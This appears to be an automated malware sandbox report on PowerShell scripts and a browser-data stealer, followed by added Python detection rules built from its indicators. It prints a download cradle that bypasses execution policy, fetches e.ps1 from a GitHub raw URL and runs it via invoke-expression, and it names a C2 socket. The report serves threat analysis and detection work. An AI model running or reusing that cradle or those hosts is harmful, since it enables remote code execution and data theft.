N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\exclude.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $pl = iwr https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/e.ps1; invoke-expression $pl

Network

N/A

Files

memory/2672-4-0x000007FEF5CEE000-0x000007FEF5CEF000-memory.dmp

memory/2672-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

memory/2672-7-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

memory/2672-8-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

memory/2672-6-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

memory/2672-9-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

memory/2672-10-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

memory/2672-11-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 15949652452d63a0038444a725cc7945
SHA1 a3da3f48ae9ef882ec9cb2b089684a7aa755ebe6
SHA256 ecb4c8f2a83ee45e03f6c591ed6b20ee244d80429b43b66317dd59677c14eb2c
SHA512 4be22050b6bc257c842b85d14f5bc01d2487344b815f328a7139ade6895215799ed5750b6fbf14d8dbdfac4b8f9b8f85dd46d9c7564163349d1cfcb2edbcd2ce

memory/2584-18-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

memory/2672-17-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

memory/2584-19-0x000007FEF5A30000-0x000007FEF63CD000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

124s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\exclude.ps1

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\exclude.ps1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command $pl = iwr https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/e.ps1; invoke-expression $pl

Network

Country Destination Domain Proto
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 7.98.22.2.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/3424-0-0x00007FFA89BB3000-0x00007FFA89BB5000-memory.dmp

memory/3424-10-0x000001533F760000-0x000001533F782000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wv4zzno4.he4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3424-11-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

memory/3424-12-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/2460-17-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

memory/3424-16-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 83449265ddea29564af2cefc93493459
SHA1 8068c5f88cf4ba3e5f10fa864461c72f9d368d4d
SHA256 26ce8143a8c7ba0a96779bdacab1ee547b89840abd1d1cb4a8d8b2d99d72e8e9
SHA512 89b342aa6fd4a83ed99f6030b1e7bffb63c8ee3eddbba7324e5a265a1968536c4de28e42ecdee13566ef2c3904cfc3ecb7bd33d58d2d3b5d6c7f0ae476203e9d

memory/2460-28-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp

memory/2460-29-0x00000172AA730000-0x00000172AAED6000-memory.dmp

memory/2460-32-0x00007FFA89BB0000-0x00007FFA8A671000-memory.dmp
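The behavioral5 and behavioral6 detonations above record the full chain a detection engineer needs: exclude.ps1 spawns a second PowerShell with -ExecutionPolicy Bypass that fetches e.ps1 from raw.githubusercontent.com with iwr and runs it through invoke-expression, m.ps1 opens repeated TCP connections to 64.227.161.180:4443, and the bdata.exe detonation writes copies of Chromium "Local Storage" and "Session Storage" LevelDB directories under %TEMP%. The Python below is an added example written for this report, not sandbox output or tooling from the sample's author; it turns those three observations into rules and runs them over constructed process, network and file events. The Event schema, the rule names, the browser image list and the verb lists are assumptions for illustration; the command line, destination socket, domain and file paths are taken from this report.

```python
"""Rules for the behaviours this report records, run over constructed events.
The event records below are built for this example from the command lines,
destinations and paths in the report; they are not sandbox telemetry."""
import re
from dataclasses import dataclass

# Indicators copied from the Network tables of this report.
C2_SOCKETS = {("64.227.161.180", 4443)}
PAYLOAD_HOSTS = {"raw.githubusercontent.com"}

# PowerShell download-cradle heuristics (ATT&CK T1059.001); the verb lists
# are an assumption covering the common cradles, not only the one seen here.
POLICY_BYPASS = re.compile(r"-e(p|x|xec|xecutionpolicy)\s+bypass", re.I)
DOWNLOAD_VERB = re.compile(
    r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile)\b", re.I)
EXEC_VERB = re.compile(r"\b(iex|invoke-expression)\b", re.I)
REMOTE_PS1 = re.compile(r"https?://raw\.githubusercontent\.com/\S+\.ps1", re.I)

# File heuristics: Chromium profile stores written under the user's Temp
# directory, which is how the bdata.exe detonation stages copied LevelDB data.
BROWSER_STORE = re.compile(r"\\(Local Storage|Session Storage)[^\\]*\\", re.I)
USER_TEMP = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe")
BROWSERS = ("chrome.exe", "msedge.exe", "brave.exe")   # assumed allow-list


@dataclass
class Event:
    kind: str           # "process", "network" or "file"
    image: str          # image path of the acting process
    cmdline: str = ""   # process events
    dst_ip: str = ""    # network events
    dst_port: int = 0
    domain: str = ""    # name resolved or connected to, if any
    path: str = ""      # file events: path being created


def _basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def rules_for_process(e: Event) -> list:
    hits = []
    if _basename(e.image) not in SCRIPT_HOSTS:
        return hits
    if POLICY_BYPASS.search(e.cmdline):
        hits.append("ps_execution_policy_bypass")
    if DOWNLOAD_VERB.search(e.cmdline) and EXEC_VERB.search(e.cmdline):
        hits.append("ps_download_cradle")
    if REMOTE_PS1.search(e.cmdline):
        hits.append("ps1_fetched_from_github_raw")
    return hits


def rules_for_network(e: Event) -> list:
    hits = []
    if (e.dst_ip, e.dst_port) in C2_SOCKETS:
        hits.append("known_c2_socket")
    # Code-hosting domains are noisy; only flag them from a scripting host.
    if e.domain.lower() in PAYLOAD_HOSTS and _basename(e.image) in SCRIPT_HOSTS:
        hits.append("script_host_contacts_code_hosting")
    return hits


def rules_for_file(e: Event) -> list:
    hits = []
    if (USER_TEMP.search(e.path) and BROWSER_STORE.search(e.path)
            and _basename(e.image) not in BROWSERS):
        hits.append("browser_store_copied_to_temp")
    return hits


def evaluate(events) -> dict:
    """Return {rule_name: [image, ...]} for every rule that fired."""
    dispatch = {"process": rules_for_process,
                "network": rules_for_network,
                "file": rules_for_file}
    fired = {}
    for e in events:
        for rule in dispatch[e.kind](e):
            fired.setdefault(rule, []).append(e.image)
    return fired


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
BDATA = r"C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe"
SAMPLE_EVENTS = [
    # Child command line recorded in the exclude.ps1 detonations.
    Event("process", PS, cmdline='"' + PS + '" -NoProfile -ExecutionPolicy Bypass '
          '-Command $pl = iwr https://raw.githubusercontent.com/k53xupn43/i965652f'
          '/refs/heads/main/e.ps1; invoke-expression $pl'),
    # Routine administrative use of PowerShell: must not fire.
    Event("process", PS, cmdline="powershell.exe -NoProfile -Command Get-Service -Name WinRM"),
    # Destinations from the m.ps1 and exclude.ps1 detonations.
    Event("network", PS, dst_ip="64.227.161.180", dst_port=4443),
    Event("network", PS, dst_ip="185.199.109.133", dst_port=443,
          domain="raw.githubusercontent.com"),
    # LevelDB copy written by bdata.exe, and Chrome writing its own store.
    Event("file", BDATA,
          path=r"C:\Users\Admin\AppData\Local\Temp\Local Storage\leveldb_7.temp\CURRENT.bak"),
    Event("file", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
          path=r"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT"),
]

if __name__ == "__main__":
    for rule, images in sorted(evaluate(SAMPLE_EVENTS).items()):
        print(rule, "<-", ", ".join(images))
```

Two caveats when reading the rest of this report against these rules: the __PSScriptPolicyTest_*.ps1 files in the Temp directory are written by PowerShell itself while it probes AppLocker/WDAC policy and are not a script dropped by the sample, and the in-addr.arpa queries to 8.8.8.8 are reverse lookups that appear in every detonation here, including the bdata.exe run that shows no other network activity, so they are sandbox background noise rather than attacker infrastructure.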

Analysis: behavioral2

Detonation Overview

Submitted

2025-01-17 06:15

Reported

2025-01-17 06:17

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Browser Information Discovery

discovery

Processes

C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe

"C:\Users\Admin\AppData\Local\Temp\i965652f-main\bdata.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 7.98.22.2.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 180.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 22.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 181.129.81.91.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Local Storage\leveldb_7.temp\CURRENT.bak

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\Session Storage_8.temp\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b